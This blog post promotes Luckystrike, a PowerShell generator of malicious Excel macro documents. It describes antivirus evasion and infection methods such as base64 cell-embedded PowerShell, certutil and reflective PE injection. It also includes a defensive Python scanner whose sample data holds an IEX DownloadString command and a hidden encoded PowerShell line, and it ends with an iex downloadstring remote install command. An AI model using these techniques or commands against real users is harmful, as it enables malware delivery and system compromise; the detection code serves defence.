Close on the heels of my earlier post about MicroSploit, the Microsoft Office Exploitation Toolkit for *NIX platforms, this post is about Luckystrike, a malicious Microsoft Office document generator that runs on Microsoft's very own Windows platform.
What is Luckystrike?
Luckystrike is an open source script that helps you create malicious Microsoft Office documents using PowerShell's ability to interface with COM objects. As of now, it only supports creating malicious Excel files in the 97-2003 (.xls) format. The main focus is on getting your payloads through while evading antivirus products.
The author is working on adding support for Microsoft Word files. Luckystrike was designed to be flexible and easy to operate, even for inexperienced users. The script also auto-updates itself.
At the backend, a SQLite database stores your payloads in a self-contained, persistent catalog, so they can be retrieved and embedded into documents with ease. It also holds code blocks, dependency rules, and infection methods, and the database file can be shared with your team members whenever required. You can embed standard shell commands, custom PowerShell scripts, or even executable files (.exe) as payloads; each one is saved in the SQLite database file and can be used repeatedly. If you want to be really sure that your code executes, you can infect a document with multiple payloads of different infection types too!
The problem that I faced when trying to use this script was that on installation, my AV caught the file as malicious. After adding it to the exclusions, I was able to execute it. The first time, though, I was a bit confused reading about the 5 options – catalog, payload, template and infection type. This is what they mean:
- Payload – A command, PowerShell script, or executable to be executed on the target machine.
- Catalog – A SQLite database containing saved payloads.
- Infection Type – The means by which to launch a payload on a target system.
- Template – A .xls file that is saved in the database to be used for generating a new, infected file.
Currently supported infection types are:
- Shell Command – Uses Wscript.Shell to fire the command exactly as is in a hidden window. Be sure your escapes are correct.
- Cell Embed – Your “go to” for firing PowerShell scripts. Base64 encodes .ps1 payload then embeds into cells. Macro concatenates then fires directly with PowerShell. Payload does not touch disk.
- Cell Embed-nonB64 – Embeds .ps1 into cells (no b64). Does NOT save payload to disk. Fires directly with powershell.exe.
- Cell Embed-Encrypted – Embeds RC4 encrypted .ps1 into cells (no b64). Does NOT save payload to disk. Key is the user’s email domain (retrieved from AD). Fired directly with powershell.exe. Careful to escape properly.
- Certutil – Saves base64 encoded .exe to a text file and then uses certutil to execute it.
- Save To Disk – Saves exe to disk (%APPDATA%) then fires.
- ReflectivePE – Saves b64 encoded PE as a text file then uses Invoke-ReflectivePEInjection to fire it.
- Metadata – Saves your shell command to the `Subject` field of the document metadata. Good for Empire stagers! Unfortunately, you can include only one metadata payload at a time.
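From a defender's standpoint, the infection types above share a few observable traits: a PowerShell payload, base64-encoded or not, split across cells that the macro concatenates before firing, plaintext references to `Wscript.Shell`, `certutil` or `Invoke-ReflectivePEInjection`, and a shell command stored in the `Subject` document property. The Python below is an added example written for this post, not part of the original article or of Luckystrike, showing a triage heuristic that runs over cell values and document properties already extracted from a workbook by some other tool. The sample cells and metadata are constructed inline, and the `SAMPLE_*` names, the cell addresses and the token list are assumptions for the example.

```python
import base64
import binascii
import re

# Tokens the infection types described above leave in plaintext or in a decoded
# payload. This list is an assumption for the example; extend it to taste.
SUSPICIOUS_TOKENS = (
    "powershell",
    "wscript.shell",
    "certutil",
    "invoke-reflectivepeinjection",
    "downloadstring",
    "-encodedcommand",
    "frombase64string",
)

# A cell made entirely of base64 alphabet characters is a candidate payload chunk.
B64_CHUNK = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def find_tokens(text):
    """Return the suspicious tokens present in text (case-insensitive)."""
    low = text.lower()
    return [t for t in SUSPICIOUS_TOKENS if t in low]


def looks_like_base64_chunk(value, min_len=16):
    """True if a cell value is a base64-only string long enough to be a payload chunk."""
    return (isinstance(value, str)
            and len(value.strip()) >= min_len
            and bool(B64_CHUNK.match(value.strip())))


def decode_candidates(blob):
    """Decode a base64 blob and return plausible text renderings (UTF-8, then UTF-16LE)."""
    blob = blob.rstrip("=")
    padded = blob + "=" * (-len(blob) % 4)  # chunks split across cells may lose padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return []
    out = []
    for enc in ("utf-8", "utf-16-le"):
        try:
            out.append(raw.decode(enc))
        except UnicodeDecodeError:
            pass
    return out


def _check_run(findings, start_addr, chunks):
    """Concatenate a run of base64-looking cells (as the macro would) and decode it."""
    for text in decode_candidates("".join(chunks)):
        hits = find_tokens(text)
        if hits:
            findings.append({"where": start_addr, "kind": "base64_cells",
                             "cells": len(chunks), "tokens": hits, "preview": text[:60]})
            return


def scan_workbook(cells, metadata):
    """cells: iterable of (address, value) in sheet order; metadata: dict of document
    properties. Returns a list of findings, each a dict with 'where', 'kind', 'tokens'."""
    findings = []
    cells = list(cells)

    # 1. Plaintext indicators in cell values (Shell Command, Cell Embed-nonB64).
    for addr, value in cells:
        if isinstance(value, str):
            hits = find_tokens(value)
            if hits:
                findings.append({"where": addr, "kind": "plaintext_cell", "tokens": hits})

    # 2. Plaintext indicators in document properties (Metadata infection type).
    for name, value in metadata.items():
        hits = find_tokens(str(value))
        if hits:
            findings.append({"where": f"metadata:{name}", "kind": "plaintext_metadata",
                             "tokens": hits})

    # 3. Runs of consecutive base64-looking cells, joined before decoding (Cell Embed).
    run, start = [], None
    for addr, value in cells:
        if looks_like_base64_chunk(value):
            if not run:
                start = addr
            run.append(value.strip())
        elif run:
            _check_run(findings, start, run)
            run, start = [], None
    if run:
        _check_run(findings, start, run)
    return findings


# Constructed sample input, standing in for values extracted from a workbook.
SAMPLE_SCRIPT = (
    "Write-Output 'constructed sample'; "
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')"
)
_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode("ascii")
SAMPLE_CELLS = [
    ("Sheet1!A1", "Region"), ("Sheet1!B1", "Q1 revenue"),
    ("Sheet1!A2", "North"), ("Sheet1!B2", 1250.0),
    # payload split over three cells, as the Cell Embed type does before the macro joins them
    ("Sheet2!A1", _B64[:40]), ("Sheet2!A2", _B64[40:80]), ("Sheet2!A3", _B64[80:]),
]
SAMPLE_METADATA = {"Title": "FY report", "Subject": "powershell.exe -w hidden -e <placeholder>"}

if __name__ == "__main__":
    for finding in scan_workbook(SAMPLE_CELLS, SAMPLE_METADATA):
        print(finding)
```

The run-joining step matters more than the per-cell check: a chunk of a base64 payload decodes to nothing useful on its own, so only the concatenation reveals the `DownloadString` call. Both decodings are tried because PowerShell's `-EncodedCommand` expects UTF-16LE while a .ps1 embedded as-is is usually UTF-8. Short tokens such as `iex` were deliberately left out of the list to keep false positives down; the RC4-encrypted variant above will not be caught by this heuristic at all, since its cells contain ciphertext rather than base64, so treat this as a first-pass triage rather than a verdict.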
All in all, this looks like a good start. Can’t wait for future releases as this tool looks promising!
The installation script takes care of everything for you. All you need is a Microsoft Windows system with PowerShell v5 and the PSSQLite module; if the module is missing, the script installs it. All you need to do is run the following command from an elevated PowerShell prompt:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')
Detailed instructions and the source code for luckystrike.ps1 can be found here.